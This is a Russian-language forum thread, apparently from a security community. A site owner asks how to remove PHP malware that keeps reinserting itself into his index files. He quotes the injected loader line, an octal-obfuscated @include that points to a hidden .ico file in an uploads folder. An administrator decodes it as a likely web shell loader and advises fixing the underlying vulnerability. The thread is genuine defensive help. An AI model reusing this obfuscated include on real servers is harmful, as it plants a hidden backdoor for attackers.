• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Проблема с вредоносным кодом PHP, который сам встраивается

Кирилл Цицорин

Кирилл Цицорин

New member
15.08.2022
2
0
BIT
0
Всем доброго времени суток. Прошу знающих подсказать, как бороться с данной патологией ибо Я сам очень далек от ИБ.
Дело в том, что в один момент, полгода назад на сервере появились подозрительные файлы расширения .php и .ico.
Файлы php имели названия из набора латинских букв. Но самое неудобное, что во все индексы встраивается вот этот код:
PHP: 
/*51ceb*/

@include "\057var\057www\057kir\151ll/\144ot.\155edk\162mu/\146las\153/up\154oad\163/96\06141/\0568f0\06373d\067.ic\157";

/*51ceb*/
imagee_2022-08-15_15-18-49.png


Вот сами файлы.

Подскажитее как решить проблему, пожалуйста.
 
Сортировать по дате Сортировать по голосам
larchik

larchik

Администратор
07.06.2019
370
418
BIT
191
Кирилл Цицорин сказал(а):
Всем доброго времени суток. Прошу знающих подсказать, как бороться с данной патологией ибо Я сам очень далек от ИБ.
Дело в том, что в один момент, полгода назад на сервере появились подозрительные файлы расширения .php и .ico.
Файлы php имели названия из набора латинских букв. Но самое неудобное, что во все индексы встраивается вот этот код:
PHP: 
/*51ceb*/

@include "\057var\057www\057kir\151ll/\144ot.\155edk\162mu/\146las\153/up\154oad\163/96\06141/\0568f0\06373d\067.ic\157";

/*51ceb*/
Посмотреть вложение 62392

Вот сами файлы.

Подскажитее как решить проблему, пожалуйста.
Нажмите, чтобы раскрыть...
Привет. Похоже на то, что встраиваемый код включает какой-то файл по пути /var/www/kiril/.../flask/uploads/96141/.8f0373d7.ico
Вероятно этот самый файл - полезная нагрузка (вебшелл или еще что-то). Это говорит о том, что сервер уязвим (скорее всего сам сайт). Следовательно, чтобы решить проблему, надо найти уязвимость и устранить ее.

Кирилл Цицорин сказал(а):
если бы у нас был бюджет то обратились бы)
Нажмите, чтобы раскрыть...
Поэтому бюджет нужен.

Ты не одинок, тут по тексту описана эта проблема:
Ссылка скрыта от гостей

Направление, в какую сторону копать, у тебя есть.
 
Последнее редактирование:
За 1 Против
Кирилл Цицорин

Кирилл Цицорин

New member
15.08.2022
2
0
BIT
0
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ